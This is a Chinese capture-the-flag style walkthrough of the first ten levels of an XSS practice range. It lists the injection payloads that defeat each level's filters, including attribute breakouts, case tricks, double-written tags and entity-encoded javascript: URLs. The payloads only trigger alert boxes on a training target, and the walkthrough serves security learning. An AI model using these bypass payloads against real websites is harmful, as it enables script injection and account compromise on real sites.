登陆 注册

哆啦靶场XSS挑战赛1-10关攻略

Lzers 2020-05-06 12517人围观 安全文摘

哆啦集成了网络上常见的靶场与GitHub上比较好的靶场系统,配合一键启动模式,省去你去收集再进行搭建的时间,方便你更加快速的学习信息安全。

该靶场已经正式开源,黑白网去除登录限制重构靶场环境,bachang.heibai.org

正文部分

XSS挑战赛第一关

F12查看了源码发现并没有任何过滤,

<script>alert(1)</script>

XSS挑战赛第二关

查看源码发现<>尖括号无法使用

框内输入

" onmouseover=alert(1)>[object Object]

或者将input文本框提前闭合

"><script>alert(1)</script>[object Object]

XSS挑战赛第三关

和第二关的区别在于代码内多了一句value='".htmlspecialchars($str)."'

无法使用尖括号,so继续使用不用尖括号的弹窗

' onmouseover=alert(1)//

在源码构成

<input name="keyword" value=" " onmouseover="alert(1)//'">

即可

XSS挑战赛第四关

htmlspecialchars+尖括号过滤

在没有尖括号并且语句不被htmlspecialchars()函数影响的情况下

输入

" onclick=alert(1) //

在点击搜索框触发XSS

XSS挑战赛第五关

strreplace 就直接把on转换成 o_n
这样就过滤了js事件但是没过滤尖括号

所以

"><a href=javascript:alert(1)>

即可

点击“>触发

XSS挑战赛第六关

script 转换成 scr_ipt
on 转换成 o_n
src 转换成 sr_c
data 转换成 da_ta
href 转换成 hr_ef

但是没有大小写约束

"> <Script>alert(1)</script> //

直接冲冲冲

XSS挑战赛第七关

禁用了大小写同时script,on,src ,data ,href 都直接转换成空。

利用双写绕过

">hello<sscriptcript>alert(1)</sscriptcript>

XSS挑战赛第八关

script 转换成 scr_ipt
on 转换成 o_n
src 转换成 sr_c
data 转换成 da_ta
href 转换成 hr_ef
大小写禁用
" 被编码,但是尖括号等符号没有被过滤,输出点在a标签内,href属性中

javascript会被替换成javasc_rpt,我们使用&#x72来代替r

键入

javascrip&#x74;:alert(1)

并点击添加后,再点击友情链接即可触发

XSS挑战赛第九关

查看源码发现不带http://即为不合法提交

javascrip&#x74;:alert(1)//http://heibai.org

键入后点击友情链接即可触发

XSS挑战赛第十关

查看源代码,有get参数有隐藏框

keyword = test&t_sort="type="text" onclick = "alert(1)

直接冲冲冲

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.